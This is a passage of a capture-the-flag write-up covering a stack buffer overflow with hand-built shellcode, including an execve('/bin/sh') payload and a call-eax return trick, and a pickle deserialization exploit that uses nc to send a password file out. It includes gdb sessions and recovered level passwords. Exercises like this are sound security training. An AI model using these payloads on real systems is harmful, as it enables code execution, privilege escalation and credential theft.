   |    |                 .                                        | stack
   |    |                 .                                        | frame
   |    |    +------------+------------+                           |
   |    |    | 0xffa3f200 | 0xffa3f92b |----> parameter `*str`     |
   |    |    +------------+------------+                           |
   |    |    | 0xffa3f1fc | 0x080484dc |----> return from `fun`  <-+
   |    |    +------------+------------+
   |    +--->| 0xffa3f1f8 | 0xffa3f218 |                         <-+
   |         +------------+------------+                           |
   |                      .                                        | `fun`s
   |                      .                                        | stack
   |                      .                                        | frame
   |         +------------+------------+                           |
   +-------->| 0xffa3ede0 | 0x???????? |                         <-+
             +------------+------------+

Either for alignment reasons, or just to rub in how dumb I am, the compiler
allocates 1024 bytes of the stack frame for buf, starting after two empty
words under the top of the frame. The frame ends with two more inexplicable
blank words, and two words which are eventually used to pass the two arguments
to strcpy:
  esp  ebp      Address       Value
   |    |    +------------+------------+
   |    |    | 0xffa3f218 | 0xffa3f298 |                         <-+
   |    |    +------------+------------+                           |
   |    |                 .                                        | `main`s
   |    |                 .                                        | stack
   |    |                 .                                        | frame
   |    |    +------------+------------+                           |
   |    |    | 0xffa3f200 | 0xffa3f92b |----> parameter `*str`     |
   |    |    +------------+------------+                           |
   |    |    | 0xffa3f1fc | 0x080484dc |----> return from `fun`  <-+
   |    |    +------------+------------+
   |    +--->| 0xffa3f1f8 | 0xffa3f218 |                         <-+
   |         +------------+------------+                           |
   |         | 0xffa3f1f4 |            |                           |
   |         +------------+------------+                           |
   |         | 0xffa3f1f0 |            |                           |
   |         +------------+------------+                           |
   |         | 0xffa3f1ec |            |             <-+           |
   |         +------------+------------+               |           |
   |                      .                            | 1024      |
   |                      .                            | byte      | `fun`s
   |                      .                            | `buf`     | stack
   |         +------------+------------+               |           | frame
   |         | 0xffa3edf0 |            |             <-+           |
   |         +------------+------------+                           |
   |         | 0xffa3edec |            |                           |
   |         +------------+------------+                           |
   |         | 0xffa3ede8 |            |                           |
   |         +------------+------------+                           |
   |         | 0xffa3ede4 |            |                           |
   |         +------------+------------+                           |
   +-------->| 0xffa3ede0 |            |                         <-+
             +------------+------------+

Let's look at how that strcpy call works. First, we push on the address of
the str parameter with:
mov    eax,DWORD PTR [ebp+0x8]
mov    DWORD PTR [esp+0x4],eax
Now our stack looks like this:
  esp  ebp      Address       Value
   |    |    +------------+------------+
   |    |    | 0xffa3f218 | 0xffa3f298 |                         <-+
   |    |    +------------+------------+                           |
   |    |                 .                                        | `main`s
   |    |                 .                                        | stack
   |    |                 .                                        | frame
   |    |    +------------+------------+                           |
   |    |    | 0xffa3f200 | 0xffa3f92b |----> parameter `*str`     |
   |    |    +------------+------------+                           |
   |    |    | 0xffa3f1fc | 0x080484dc |----> return from `fun`  <-+
   |    |    +------------+------------+
   |    +--->| 0xffa3f1f8 | 0xffa3f218 |                         <-+
   |         +------------+------------+                           |
   |         | 0xffa3f1f4 |            |                           |
   |         +------------+------------+                           |
   |         | 0xffa3f1f0 |            |                           |
   |         +------------+------------+                           |
   |         | 0xffa3f1ec |            |             <-+           |
   |         +------------+------------+               |           |
   |                      .                            | 1024      |
   |                      .                            | byte      | `fun`s
   |                      .                            | `buf`     | stack
   |         +------------+------------+               |           | frame
   |         | 0xffa3edf0 |            |             <-+           |
   |         +------------+------------+                           |
   |         | 0xffa3edec |            |                           |
   |         +------------+------------+                           |
   |         | 0xffa3ede8 |            |                           |
   |         +------------+------------+                           |
   |         | 0xffa3ede4 | 0xffa3f92b |----> parameter `*str`     |
   |         +------------+------------+                           |
   +-------->| 0xffa3ede0 |            |                         <-+
             +------------+------------+

Now, we calculate the start address of buf, and put it on the top of the stack:
lea    eax,[ebp-0x408]
mov    DWORD PTR [esp],eax
Directly before and directly after the call to strcpy, our stack looks like
this:
  esp  ebp      Address       Value
   |    |    +------------+------------+
   |    |    | 0xffa3f218 | 0xffa3f298 |                         <-+
   |    |    +------------+------------+                           |
   |    |                 .                                        | `main`s
   |    |                 .                                        | stack
   |    |                 .                                        | frame
   |    |    +------------+------------+                           |
   |    |    | 0xffa3f200 | 0xffa3f92b |----> parameter `*str`     |
   |    |    +------------+------------+                           |
   |    |    | 0xffa3f1fc | 0x080484dc |----> return from `fun`  <-+
   |    |    +------------+------------+
   |    +--->| 0xffa3f1f8 | 0xffa3f218 |                         <-+
   |         +------------+------------+                           |
   |         | 0xffa3f1f4 |            |                           |
   |         +------------+------------+                           |
   |         | 0xffa3f1f0 |            |                           |
   |         +------------+------------+                           |
   |         | 0xffa3f1ec |            |             <-+           |
   |         +------------+------------+               |           |
   |                      .                            | 1024      |
   |                      .                            | byte      | `fun`s
   |                      .                            | `buf`     | stack
   |         +------------+------------+               |           | frame
   |         | 0xffa3edf0 |            |             <-+           |
   |         +------------+------------+                           |
   |         | 0xffa3edec |            |                           |
   |         +------------+------------+                           |
   |         | 0xffa3ede8 |            |                           |
   |         +------------+------------+                           |
   |         | 0xffa3ede4 | 0xffa3f92b |----> parameter `*str`     |
   |         +------------+------------+                           |
   +-------->| 0xffa3ede0 | 0xffa3edf0 |----> beginning of `buf` <-+
             +------------+------------+

Let's see what happens after the call. The leave instruction is basically just
sugar for the two instructions mov esp, ebp and pop ebp. This is what the stack
looks like afterwards:
  esp  ebp      Address       Value
   |    |    +------------+------------+
   |    +--->| 0xffa3f218 | 0xffa3f298 |                         <-+
   |         +------------+------------+                           |
   |                      .                                        | `main`s
   |                      .                                        | stack
   |                      .                                        | frame
   |         +------------+------------+                           |
   |         | 0xffa3f200 | 0xffa3f92b |----> parameter `*str`     |
   |         +------------+------------+                           |
   +-------->| 0xffa3f1fc | 0x080484dc |----> return from `fun`  <-+
             +------------+------------+

With one instruction, we're back to our original picture. Neat. Now all that's left
is the ret instruction, which simply pops the last value off the stack, and jumps
to it. After ret, execution will continue at the address 0x080484dc.
Ok whew, all that was just to make sure we have all our mental model straight for
the real work ahead. Notice that the return location is stored extremely close to
buf, and there's nothing stopping us from overwriting it. Putting together the
pieces, we want to inject the malicious string of assembly we constructed earlier
into memory somewhere, and overwrite the return address from fun to point to it.
We also need to include the actual cat command that we're going to pass to the
system function call. Here's one way to lay out our buffer:
The command:
cat /etc/level05/.password ; #
|------------30--------------|

The function call:
\x68\xbc\x23\xc3\xff\xb8\x7c\x84\x04\x08\xff\xd0
|--------------------12------------------------|

The padding:
<any character that isn't \0>
|----------994--------------|

The overwritten return address:
\x??\x??\x??\x??
|------4-------|

The padding is the magic that gets everything going. It should push the address
we'll be crafting in a moment into the return address from fun. Let's try it
with 0x12345678 for our return address. We'll get a segfault, but we'll know we're
on the right track. I'm going to make a ruby file make_payload.rb to make the
actual payload:
command = "cat /etc/level05/.password ; #"
code = "\x68\xbc\x23\xc3\xff\xb8\x7c\x84\x04\x08\xff\xd0"
padding = 'a' * 994
addr = "\x78\x56\x34\x12"
File.open("payload", "w") { | f | f.write(command + code + padding + addr) }
Once we run it, we should have what we want in payload. Alright, let's see
what happens when we use that as input to the program:
$ gdb /levels/level04
# ...
Reading symbols from /levels/level04...(no debugging symbols found)...done.
(gdb) set disassembly-flavor intel
(gdb) disassemble fun
Dump of assembler code for function fun:
   0x08048484 <+0>:	push   ebp
   0x08048485 <+1>:	mov    ebp,esp
   0x08048487 <+3>:	sub    esp,0x418
   0x0804848d <+9>:	mov    eax,DWORD PTR [ebp+0x8]
   0x08048490 <+12>:	mov    DWORD PTR [esp+0x4],eax
   0x08048494 <+16>:	lea    eax,[ebp-0x408]
   0x0804849a <+22>:	mov    DWORD PTR [esp],eax
   0x0804849d <+25>:	call   0x8048388 <strcpy@plt>
   0x080484a2 <+30>:	leave
   0x080484a3 <+31>:	ret
End of assembler dump.
(gdb) break *0x080484a2
Breakpoint 1 at 0x80484a2
(gdb) run "`cat payload`"
Starting program: /levels/level04 "`cat payload`"

Breakpoint 1, 0x080484a2 in fun ()
(gdb) x/1xw $ebp+4
0xff86e98c:	0x12345678

Well look at that! There's our injected address right where we wanted it! Now,
let's start making some numbers real. Ok, let's find the address of system,
because our payload needs that:
(gdb) print system
No symbol table is loaded.  Use the "file" command.

Hmmm, ok, so gdb doesn't work very well without debug symbols. Surely we can
find it with nm:
$ nm /levels/level04 | grep system
$

So here's the thing, that symbol doesn't exist in our binary at all because
there was no reason to link it in, because the program contains no usages of
it! Clearly we need a new approach. One option would be to find another function
that is linked in that could be made to print the contents of a file. In terms
of libc functions, we have exit, printf, puts, and strcpy. Ok, so if we
read in the contents of /home/level05/.password, then we can probably figure
out how to print it out with printf or puts. But how do we read the file?
We don't have the read symbol, so we seem to be back at square one.
At this point, we need to understand what those magical libc functions actually
do. The long story short is that functions like system and read end up calling
Linux system calls, and even longer story even shorter, we can do that ourselves
by using the 0x80 interrupt vector. It works like this: you put the number of
the system call into eax, and the arguments to the call into ebx, ecx, and edx
you execute int 0x80, and the kernel takes over. You can find the list of
supported syscalls with their numbers in /usr/include/asm/unistd_32.h, and
you can find their signatures in man 2 <syscall>. Note, there is no system
syscall. I suspect the system function eventually calls execve after doing
some parameter parsing.
I'm sure we could figure out how to use execve to run our cat command, but
I think there's a better way. The cat command with a single argument merely
reads the file named by that argument into memory, and writes it out to standard
out. This can be done with three syscalls: open to get a descriptor for a file
by name, read to read from that descriptor into memory, and write to write
to the (already open) descriptor for standard out.  Let's write some code for
this! First, we'll make a full version that runs as a standalone program, so we
can test that it works:
SECTION .bss
	BufLen equ 16
	Buf resb BufLen

SECTION .data
	FileName db "blah", 0x0

SECTION .text
global _start			; Entry point for ld

_start:
	mov eax, 5		; `open` syscall
	mov ebx, FileName	; Open FileName
	mov ecx, 0		; Read-only
	int 0x80		; Make syscall

	mov ebx, eax		; Put descriptor returned from `open` in ebx for `read` call
	mov eax, 3		; `read` syscall
	mov ecx, Buf		; Read into Buf
	mov edx, BufLen		; Read BufLen bytes
	int 0x80		; Make syscall

	mov eax, 4		; `sys_write` syscall
	mov ebx, 1		; Use stdout
	mov ecx, Buf		; Write from Buf
	mov edx, BufLen		; Write BufLen bytes
	int 0x80		; Make syscall

	mov eax, 1		; `exit` syscall
	mov ebx, 0		; Exit code 0
	int 0x80		; Exit
Now you should be able to "cat" a file named "blah":
$ nasm -f elf32 -g -o level04.o level04.asm
$ ld -o level04 level04.o
$ echo "blah" > blah
$ ./level04
blah
Ok good, but now we need to make this more suitable for injection. We won't have
the luxury of running in the .text section or referencing any symbols at all.
We'll be running purely from within a chunk of memory in .bss. Let's see if
we can mimic this setup and keep our program working:
SECTION .data
	mov esi, 0x8049088	; Keep track of location of our code
	mov eax, 5		; `open` syscall
	mov ebx, esi		; Open FileName
	add ebx, 91		; Code takes 75 bytes, buffer takes 16
	mov ecx, 0		; Read-only
	int 0x80		; Make syscall

	mov ebx, eax		; Put descriptor returned from `open` in ebx for `read` call
	mov eax, 3		; `read` syscall
	mov ecx, esi
	add ecx, 75		; 72 bytes of code, then buffer starts
	mov edx, 16		; Read BufLen bytes
	int 0x80		; Make syscall

	mov eax, 4		; `sys_write` syscall
	mov ebx, 1		; Use stdout
	mov ecx, esi
	add ecx, 75		; Write from Buf
	mov edx, 16		; Write BufLen bytes
	int 0x80		; Make syscall

	mov eax, 1		; `exit` syscall
	mov ebx, 0		; Exit code 0
	int 0x80		; Exit

	db 0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0
	db "blah", 0x0
	
SECTION .text
global _start			; Entry point for ld
	
_start:
	jmp 0x8049088
Note that the chunk of code in .data is fully self-contained. If we manage to
jump to it, and if it actually lives at 0x8049088, it will print the contents of
the blah file. Good, let's turn this runnable program into the 1040-byte string
payload we need to overflow our buffer the way we want. We'll replace the string
"blah" with "/home/level05/.password" to get the real file we want, remove all
the support code, add a word at the end with the address of our code, and pad
before it with no-ops to get the right length. We also need to add BITS 32 in
anticipation of building a flat binary, which defaults to 16-bit mode:
	BITS 32

	mov esi, 0x8049088	; Keep track of location of our code
	mov eax, 5		; `open` syscall
	mov ebx, esi		; Open FileName
	add ebx, 91		; Code takes 75 bytes, buffer takes 16
	mov ecx, 0		; Read-only
	int 0x80		; Make syscall

	mov ebx, eax		; Put descriptor returned from `open` in ebx for `read` call
	mov eax, 3		; `read` syscall
	mov ecx, esi
	add ecx, 75		; 72 bytes of code, then buffer starts
	mov edx, 16		; Read BufLen bytes
	int 0x80		; Make syscall

	mov eax, 4		; `sys_write` syscall
	mov ebx, 1		; Use stdout
	mov ecx, esi
	add ecx, 75		; Write from Buf
	mov edx, 16		; Write BufLen bytes
	int 0x80		; Make syscall

	mov eax, 1		; `exit` syscall
	mov ebx, 0		; Exit code 0
	int 0x80		; Exit

	db 0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0
	db "/home/level05/.password", 0x0

	times 921 nop

	dd 0x8049088
Now we generate a flat binary and make sure it's the right size:
$ nasm -f bin -o level04.o level04.asm
$ wc -c level04.o
1040 level04.o
There's a minorly interesting problem here. We can't use scp to get our payload
over to the ctf machine. There are a number of ways to work around this, but I
ended up copying the hex version of it from the output of the xxd command locally,
and pasting it as input to xxd remotely:
$ xxd -p level04.o | pbcopy # Local
$ echo "66be88..." > payload.hex # Remote
$ xxd -p -r < payload.hex > payload
$ wc -c payload
1040
Ok, we still don't expect this to work, but we're getting closer. Let's run it
and see what things look like:
(gdb) break *0x080484a2
(gdb) run "`cat payload`"
(gdb) x/32xb $ebp-0x408
0xffd662f0:	0x66	0xbe	0x88	0x90	0x04	0x08	0x66	0xb8
0xffd662f8:	0x05	0x66	0x89	0xf3	0x66	0x83	0xc3	0x5b
0xffd66300:	0x66	0xb9	0xcd	0x80	0x66	0x89	0xc3	0x66
0xffd66308:	0xb8	0x03	0x66	0x89	0xf1	0x66	0x83	0xc1

Hmm, our bytes look sorta right, but not quite. Let's look more closely at the
beginning of the hexdump:
0000000: 66 be 88 90 04 08 66 b8  f.....f.
0000008: 05 00 00 00 66 89 f3 66  ....f..f
0000010: 83 c3 5b 66 b9 00 00 00  ..[f....
0000018: 00 cd 80 66 89 c3 66 b8  ...f..f.

Ah, it looks good through 66 b8 05, but then the next byte is 66, when it
should be 00 three times! What has happened is that strcpy has trimmed our
null bytes. How annoying. We need to write a new version of our payload with null
bytes carefully avoided. Here goes:
	BITS 32

	mov esi, 0x08049088	; Keep track of location of our code
	mov al, 5		; `open` syscall
	mov ebx, esi		; Open FileName
	add ebx, 67		; Code takes 51 bytes, buffer takes 16
	xor ecx, ecx		; Read-only
	mov BYTE [esi+90], cl	; Need 0x0 as last byte in filename for open call
	int 0x80		; Make syscall

	mov ebx, eax		; Put descriptor returned from `open` in ebx for `read` call
	mov al, 3		; `read` syscall
	mov ecx, esi
	add ecx, 51		; 51 bytes of code, then buffer starts
	mov dl, 16		; Read BufLen bytes
	int 0x80		; Make syscall

	mov al, 4		; `sys_write` syscall
	mov bl, 1		; Use stdout
	mov ecx, esi
	add ecx, 51		; Write from Buf
	mov dl, 16		; Write BufLen bytes
	int 0x80		; Make syscall

	mov al, 1		; `exit` syscall
	xor ebx, ebx		; Exit code 0
	int 0x80		; Exit

	db 0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1
	db "/home/level05/.password", 0x1

	times 945 nop

	dd 0x08049088
A lot of our null bytes were coming from moving 4-byte values that were actually
only 1-byte values, thus leaving the top 3 bytes as 0. The rest were coming from
data initialization. In the case of the buffer, it doesn't matter what it is
initially since we never use the intialized values, but in the case of the file
name, we have to set its last byte back to 0 before passing it to the open call
or it won't find the proper end of our string. Of course after changing instructions
we had to recalculate all the addresses and add some more nops. After transferring
the binary, let's see what it looks like now:
(gdb) break *0x080484a2
(gdb) run "`cat payload`"
(gdb) x/8i $ebp - 0x408
   0xffbca040:	mov    esi,0x08049088
   0xffbca046:	mov    al,0x5
   0xffbca048:	mov    ebx,esi
   0xffbca04b:	add    ebx,0x43
   0xffbca04f:	xor    ecx,ecx
   0xffbca052:	mov    BYTE PTR [ebp+0x5a],cl
   0xffbca056:	int    0x80
(gdb) x/w $ebp + 4
0xffbca44c:	0x08049088

Looks great! We still need to make our absolute addresses point to the right thing
though! It should point right to the beginning of the buffer, which is at ebp-0x408,
so let's grab that value:
(gdb) break *0x080484a2
(gdb) run "`cat payload`"
(gdb) print $ebp-0x408
$1 = (void *) 0xffbca040

Open up a hex editor and modify the values:
$ xxd payload > payload.hex
# Replace 8890 0408 with 40a0 bcff
$ xxd -r payload.hex > payload
Now let's see what it looks like:
(gdb) break *0x080484a2
(gdb) run "`cat payload`"
(gdb) x/w $ebp+4
0xffab302c:	0xffbca040

Nice, we got our location into the return address! Let's make sure it still points
to the beginning of the buffer like we want:
(gdb) print $ebp-0x408
$4 = (void *) 0xffab2c20

D'oh! Our address moved. What happened is stack-randomization. To make exactly
the type of thing we're trying to do harder, many modern systems root their stacks
at a random place in memory. It makes it significantly more difficult to hard-code
jumps into code you've injected onto the stack. So what do we do now? Well, one
common technique is to pick a value and try over and over again until that value
happens to be correct. This can be improved on by putting the filler nops at the
beginning of the payload instead of the end, creating a "nop slide", where any
the payload will work regardless of what instruction in the nop slide it hits.
This helps a reasonable amount and would almost certainly work with as many nops
as we have, but we can actually use a far more clever technique to remove the
non-determinism entirely. Note that after the call to strcpy, we still have
the address of our buffer in eax:
(gdb) print/x $ebp-0x408
$10 = 0xffab2c20
(gdb) print/x $eax
$11 = 0xffab2c20

We have two occurrences of the absolute address that we need to get rid of. If
we can assume that the address is in eax when our code begins, the first occurrence
is easy. We just need to change our first instruction to mov esi, eax. The
second occurrence is the clever part - if we can find a jmp eax or call eax
instruction somewhere in the binary at an absolute address, we can use that as
our absolute address to return to, and it will then call into our buffer! So
let's go sleuthing, starting with the symbols defined in the .text section,
which we know contain code:
$ objdump -t /levels/level04 | grep .text
080483d0 l    d  .text	00000000              .text
08048400 l     F .text	00000000              __do_global_dtors_aux
08048460 l     F .text	00000000              frame_dummy
08048560 l     F .text	00000000              __do_global_ctors_aux
080484f0 g     F .text	00000005              __libc_csu_fini
080483d0 g     F .text	00000000              _start
08048484 g     F .text	00000020              fun
08048500 g     F .text	0000005a              __libc_csu_init
0804855a g     F .text	00000000              .hidden __i686.get_pc_thunk.bx
080484a4 g     F .text	0000004b              main
(gdb) disassemble __do_global_dtors_aux
# ... Nothing useful
(gdb) disassemble frame_dummy
Dump of assembler code for function frame_dummy:
   0x08048460 <+0>:	push   ebp
   0x08048461 <+1>:	mov    ebp,esp
   0x08048463 <+3>:	sub    esp,0x18
   0x08048466 <+6>:	mov    eax,ds:0x8049f1c
   0x0804846b <+11>:	test   eax,eax
   0x0804846d <+13>:	je     0x8048481 <frame_dummy+33>
   0x0804846f <+15>:	mov    eax,0x0
   0x08048474 <+20>:	test   eax,eax
   0x08048476 <+22>:	je     0x8048481 <frame_dummy+33>
   0x08048478 <+24>:	mov    DWORD PTR [esp],0x8049f1c
   0x0804847f <+31>:	call   eax
   0x08048481 <+33>:	leave
   0x08048482 <+34>:	ret
   0x08048483 <+35>:	nop
End of assembler dump.

Look at that! Right there at 0x0804847f is the call eax we need. Alright, let's
modify our payload one more time:
	BITS 32

	mov esi, eax		; Keep track of location of our code
	xor eax, eax		; Clear eax
	mov al, 5		; `open` syscall
	mov ebx, esi		; Calculate FileName address offset from beginning of code
	add ebx, 52+16		; Code takes 52 bytes, buffer takes 16
	xor ecx, ecx		; Read-only
	mov BYTE [esi+52+16+22+1], cl	; Need 0x0 as last byte in filename for open call. Code takes 48, buffer 16, filename 22
	int 0x80		; Make syscall

	mov ebx, eax		; Put descriptor returned from `open` in ebx for `read` call
	mov al, 3		; `read` syscall
	mov ecx, esi		; Calculate buffer address from beginning of code
	add ecx, 52		; 48 bytes of code, then buffer starts
	mov dl, 16		; Read 16 bytes
	int 0x80		; Make syscall

	mov al, 4		; `sys_write` syscall
	mov bl, 1		; Use stdout
	mov ecx, esi		; Calculate buffer address from beginning of code
	add ecx, 52		; Write from buffer
	xor edx, edx		; Make sure edx is empty
	mov dl, 16		; Write 16 bytes
	int 0x80		; Make syscall

	mov al, 1		; `exit` syscall
	xor ebx, ebx		; Exit code 0
	int 0x80		; Exit

	times 16 db 0x1
	db "/home/level05/.password", 0x1

	times 944 nop

	dd 0x0804847f

Alright, let's try it out!
(gdb) break *0x080484a2
(gdb) run "`cat payload`"
(gdb) x/xw $ebp+4
0xffaf11ec:	0x0804847f
(gdb) x/i 0x0804847f
   0x804847f <frame_dummy+31>:	call   eax
(gdb) print/x $eax
$1 = 0xffaf0de0
(gdb) print/x $ebp-0x408
$2 = 0xffaf0de0
(gdb) disp/i $eip
1: x/i $eip
=> 0x80484a2 <fun+30>:	leave
(gdb) stepi
0x080484a3 in fun ()
1: x/i $eip
=> 0x80484a3 <fun+31>:	ret
(gdb)
Cannot access memory at address 0x90909094
(gdb)
Cannot access memory at address 0x90909094
(gdb)
0xffaf0de2 in ?? ()
1: x/i $eip
=> 0xffaf0de2:	xor    eax,eax
(gdb) stepi
0xffaf0de4 in ?? ()
1: x/i $eip
=> 0xffaf0de4:	mov    al,0x5
(gdb)
0xffaf0de6 in ?? ()
1: x/i $eip
=> 0xffaf0de6:	mov    ebx,esi
(gdb)
0xffaf0de8 in ?? ()
1: x/i $eip
=> 0xffaf0de8:	add    ebx,0x44
(gdb)
0xffaf0deb in ?? ()
1: x/i $eip
=> 0xffaf0deb:	xor    ecx,ecx
(gdb)
0xffaf0ded in ?? ()
1: x/i $eip
=> 0xffaf0ded:	mov    BYTE PTR [esi+0x5b],cl
(gdb)
0xffaf0df0 in ?? ()
1: x/i $eip
=> 0xffaf0df0:	int    0x80
(gdb)
0xffaf0df2 in ?? ()
1: x/i $eip
=> 0xffaf0df2:	mov    ebx,eax
(gdb) print $eax
$3 = -13

That was great! It jumped into and ran our code! We got an error from our open
call, but that is to be expected - recall that the setuid mechanism doesn't work
when running under gdb. At this point we just need to cross our fingers and run
it!
$ /levels/level04 "`cat payload`"
WNWfdC5eWkIM
Ta-da! The level05 user has password "WNWfdC5eWkIM".
We wrote some very specific exploit code for the use case of reading out a file
with a known name, but we may not always know exactly what we want to do with
our heightened permissions. Because of this, the most comment exploit is to run
a brand new shell instance, which will inherit the heightened permissions. This
looks more similar to our previous exploit using system in that we want to
execute a program by name. Instead of cat, we want to execute the shell found
at /bin/sh. Recall that I speculated that system probably eventually calls
the execve syscall. We're going to call it directly. The execve call is number
11, and its signature is:
int execve(const char *filename, char *const argv[], char *const envp[])
The filename parameter is a pointer to a null-terminated string, argv is a
pointer to an array of null-terminated string arguments to the program, the first
of which is conventionally the name of file, and envp is the environment the
program should execute under. For filename we need to pass a pointer to the
string /bin/sh, which we can do with the same technique we used for the file
name in our previous payload. We don't need to send any arguments to the program,
but we do need to get the filename in as the first parameter. We'll already have
a pointer to the filename, so we can just pass a pointer to that pointer for argv.
We can safely point to a blank array for envp - a blank array of pointers is
just a single null pointer, which we'll already have at the end of argv, so we'll
just re-use that. I won't go into too much detail on the final result, but most
of it should make sense after working through our previous exploit:
	BITS 32

_code:
	mov esi, eax			; Keep track of location of our code
	xor eax, eax			; Clear eax
	mov al, 11			; `execve` syscall
	lea ebx, [esi+ToFileName]	; ebx gets pointer to filename string
	xor ecx, ecx			; Clear ecx so it can be used to clear some memory
	mov BYTE [esi+ToFileNameEnd], cl; Clear the byte at the end of FileName to make it a valid char*
	lea edx, [esi+ToArgVEnd]	; edx gets the address of the NULL word at the end of argv, representing an empty char*[] for envp
	mov DWORD [edx], ecx		; Clear the word at the end of ArgV to make it a valid char*[]
	lea ecx, [esi+ToArgV]		; ecx gets the address of argv
	mov [ecx], ebx			; Make the first element of argv point to filename
	int 0x80			; Make syscall

	mov al, 1		; `exit` syscall
	xor ebx, ebx		; Exit code 0
	int 0x80		; Exit

	ToFileName equ $-_code	; The distance to the FileName storage
	FileName db "/bin/sh"
	
	ToFileNameEnd equ $-_code	; The distance to the NULL byte ending filename
	FileNameEnd db 0x1
	
	ToArgV equ $-_code	; The distance to the beginning of argv
	FileNamePtr dd 0x01010101

	ToArgVEnd equ $-_code	; The distance to the NULL word ending argv and envp
	ArgVEnd dd 0x01010101

	CodeSize equ $-_code	; Size of code, so that we can calculate how many nops we need

	times 1036-CodeSize nop	; Pad with nops to make the length 1036

	dd 0x0804847f		; Address of instruction of `call eax` or `jmp eax`
Aaaand, it works!
$ /levels/level04 "`cat payload`"
$ whoami
level05
$ cat /home/level05/.password
WNWfdC5eWkIM
This approach is much more flexible - we can probably re-use it in other circumstances
and only need to chance the number of no-ops and the address at the end.
Level 5

Log on in as level05 with WNWfdC5eWkIM as the password.
The deal is that the level06 user is running an uppercaser service, which is
accessible through HTTP on port 9020. Let's take a look:
$ curl 127.0.0.1:9020 -d 'hello friend'
{
    "processing_time": 1.0967254638671875e-05,
    "queue_time": 0.6934969425201416,
    "result": "HELLO FRIEND"
}
Not too much too go on here, but it's definitely interesting that we are getting
timing information. Could be that we can formulate an attack that uses the timing
information to leak something important to us. This is the first level that uses
python, with the code living directly in the setuid executable /levels/level05.
It's too long to copy here, so we'll just pick and choose the interesting parts
as we go.
From an exploitation perspective, there are two major red flags, which we'll be
exploiting, both of which live in a single method:
   def deserialize(serialized):
        logger.debug('Deserializing: %r' % serialized)
        parser = re.compile('^type: (.*?); data: (.*?); job: (.*?)$', re.DOTALL)
        match = parser.match(serialized)
        direction = match.group(1)
        data = match.group(2)
        job = pickle.loads(match.group(3))
        return direction, data, job
The first thing that jumps out is the known-exploitable pickle library. Its
documentation features a prominent warning:
Warning The pickle module is not intended to be secure against erroneous or
maliciously constructed data. Never unpickle data received from an untrusted or
unauthenticated source.

This is not an idle warning - pickle can be used to execute nearly arbitrary
code. It is possible to use pickle securely, but it requires a high level of
paranoia about the data being processed. At first blush, the deserialize method
doesn't appear to unpickle user data. The only data we control should be the
portion matched by the data: (.*?); part of the regex. That's where the second
red flag comes in: we can clearly inject data into the job: (.*?) match group
when we clearly aren't meant to be able to. Demonstration:
>>> data = "realdata; job: fakejob"
>>> direction = "RESULT"
>>> job = "realjob"
>>> serialized = """type: %s; data: %s; job: %s""" % (direction, data, pickle.dumps(job))
>>> parser = re.compile('^type: (.*?); data: (.*?); job: (.*?)$', re.DOTALL)
>>> match = parser.match(serialized)
>>> match.group(2)
'realdata'
>>> match.group(3)
"fakejob; job: S'realjob'\np0\n."

Oops, whatever we pass after ; job:  will get passed directly to pickle.loads
just what the docs told us not to allow! So let's look at how you actually exploit
pickle. A pickled string is actually a self-contained stack-based programming
language, so it's possible to learn its language and write your exploit directly
in it. That's a pain, so fortunately there's a shortcut - when dumping an object,
pickle will look for a method called __reduce__, and use its return value to
construct the string. The return value is meant to something callable, and a tuple
of arguments to that callable thing, in a particular format. Here's an example:
import subprocess
class Echo(object):
  def __reduce__(self):
    return (subprocess.Popen, (('echo', 'blah'),))
import pickle
>>> x = Echo()
>>> pickle.dumps(x)
"csubprocess\nPopen\np0\n((S'echo'\np1\nS'blah'\np2\ntp3\ntp4\nRp5\n."
>>> pickle.loads(_)
blah

That's actually not the scary part. In a completely new python instance on any
machine with a python interpreter, I can now do:
>>> import pickle
>>> pickle.loads("csubprocess\nPopen\np0\n((S'echo'\np1\nS'blah'\np2\ntp3\ntp4\nRp5\n.")

That string is a self-contained echo-er anywhere I can manage to get it into a
pickle.loads call. To underscore the point by putting things together:
import pickle
import re
>>> data = "realdata; job: csubprocess\nPopen\np0\n((S'echo'\np1\nS'blah'\np2\ntp3\ntp4\nRp5\n."
>>> direction = "RESULT"
>>> job = "realjob"
>>> serialized = """type: %s; data: %s; job: %s""" % (direction, data, pickle.dumps(job))
>>> parser = re.compile('^type: (.*?); data: (.*?); job: (.*?)$', re.DOTALL)
>>> match = parser.match(serialized)
>>> match.group(3)
>>> pickle.loads(match.group(3))
blah

Ok, now that we know we can inject behavior into the server using a bad regex and
pickle, we can start thinking about how to take advantage of it. It seems like
the least fussy thing to do is to send the password over the local network. The
nc tool is great for stuff like this. Let's play around with it a bit:
$ nc -l 127.0.0.1 12345 &
[2] 9513
$ nc 127.0.0.1 12345 < /home/level05/.password
WNWfdC5eWkIM
Pretty straightforward - we set up a background process listening on a port and
then send some data through that port, which gets printed by the listening process.
We don't quite have it in the format we need it in to work with subprocess.Popen
because < /home/level05/.password isn't a normal command argument. What we need
is to send the entire command as an argument to the shell binary itself:
$ nc -l 127.0.0.1 12345 &
[2] 9527
$ /bin/sh -c "nc 127.0.0.1 12345 < /home/level05/.password"
WNWfdC5eWkIM
Now we're just executable a single program with two arguments. Here's our pickle
exploiting stub:
import subprocess
class NcPassword(object):
  def __reduce__(self):
    return (subprocess.Popen, (('/bin/sh', '-c', 'nc 127.0.0.1 12345 < /home/level06/.password'),))
This generates this payload:
"csubprocess\nPopen\np0\n((S'/bin/sh'\np1\nS'-c'\np2\nS'nc 127.0.0.1 12345 < /home/level05/.password'\np3\ntp4\ntp5\nRp6\n."

Which works as expected:
$ nc -l 127.0.0.1 12345 &
[2] 9552
$ python
>>> import pickle
>>> pickle.loads("csubprocess\nPopen\np0\n((S'/bin/sh'\np1\nS'-c'\np2\nS'nc 127.0.0.1 12345 < /home/level05/.password'\np3\ntp4\ntp5\nRp6\n.")
WNWfdC5eWkIM
At this point it's almost too easy - we change the path in our payload to point
to /home/level06.password, start our listener, and post to the service with the
payload after ; job: :
$ nc -l 127.0.0.1 12345 &
$ curl 127.0.0.1:9020 -d "`echo -e "; job: csubprocess\nPopen\np0\n((S'/bin/sh'\np1\nS'-c'\np2\nS'nc 127.0.0.1 12345 < /home/level06/.password'\np3\ntp4\ntp5\nRp6\n."`"
18aRISxV3MUS
{
    "result": "Job timed out"
}
Ohai password.